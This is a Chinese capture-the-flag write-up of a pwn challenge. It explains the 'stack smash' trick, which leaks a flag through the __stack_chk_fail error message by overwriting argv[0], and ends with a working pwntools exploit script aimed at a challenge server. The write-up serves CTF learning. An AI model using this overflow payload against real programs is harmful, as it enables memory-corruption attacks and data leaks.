拿到程序，先查一下保护状态

没开pie，接着看主函数代码逻辑

看到这里，因为程序开了canary，本程序没有可以泄露canary的方法，所以普通的栈溢出方法肯定打不了，这里可以考虑一下smash stack

Stack smash       

       在程序加了 canary 保护之后，如果我们读取的 buffer 覆盖了对应的值时，程序就会报错，而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后，如果发现 canary 被修改的话，程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串，正常情况下，这个指针指向了程序名。
所以我们只要将argv[0]改成buf地址,就可以将flag的值打印出来，我们可以动调看一下argv[0]的地址，可以使用print &__libc_argv[0]查看

再来看一下栈底地址

这样就可以算出我们读入数据的地址到argv[0]的偏移

exp：

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node5.anna.nssctf.cn",28952)

arg=0x7fffffffe538

flag_addr=0x404060

stack_rbp=0x7fffffffe450

offset=arg-stack_rbp+0x110

payload=b'a'*offset+p64(flag_addr)

io.recvuntil(b"Good Luck.\n")

io.send(payload)

io.interactive()